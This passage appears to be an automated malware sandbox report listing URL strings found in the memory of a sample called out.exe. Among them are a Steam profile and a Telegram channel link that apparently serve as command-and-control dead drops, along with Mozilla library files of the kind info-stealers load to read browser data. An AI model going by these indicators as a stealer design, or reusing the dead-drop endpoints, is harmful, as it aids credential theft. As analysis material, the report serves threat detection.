                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&l=e
                              Source: out.exe, out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                              Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                              Source: out.exeString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                              Source: out.exe, 00000000.00000002.2676579434.0000000003074000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, IIIEBG.0.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                              Source: out.exe, 00000000.00000002.2676579434.0000000003074000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, IIIEBG.0.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://help.steampowered.com/en/
                              Source: IIIEBG.0.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                              Source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://mozilla.org0/
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                              Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/discussions/
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                              Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869
                              Source: out.exe, out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/market/
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                              Source: out.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/badges
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2297618303.0000000002FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869/inventory/
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869U
                              Source: out.exe, 00000000.00000003.2297618303.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869h
                              Source: out.exeString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://steamcommunity.com/workshop/
                              Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                              Source: 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/about/
                              Source: out.exe, out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/explore/
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/legal/
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/mobile
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/news/
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/points/shop/
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/stats/
                              Source: out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                              Source: out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                              Source: AFIDGD.0.drString found in binary or memory: https://support.mozilla.org
                              Source: AFIDGD.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                              Source: AFIDGD.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                              Source: out.exeString found in binary or memory: https://t.me/ae5ed
                              Source: out.exe, 00000000.00000002.2676579434.0000000003074000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, IIIEBG.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                              Source: out.exe, 00000000.00000002.2676579434.0000000003074000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000003037000.00000004.00000020.00020000.00000000.sdmp, IIIEBG.0.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                              Source: out.exe, 00000000.00000003.2501204879.0000000003053000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                              Source: out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                              Source: out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                              Source: AFIDGD.0.drString found in binary or memory: https://www.mozilla.org
                              Source: out.exe, 00000000.00000002.2681168765.0000000024E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
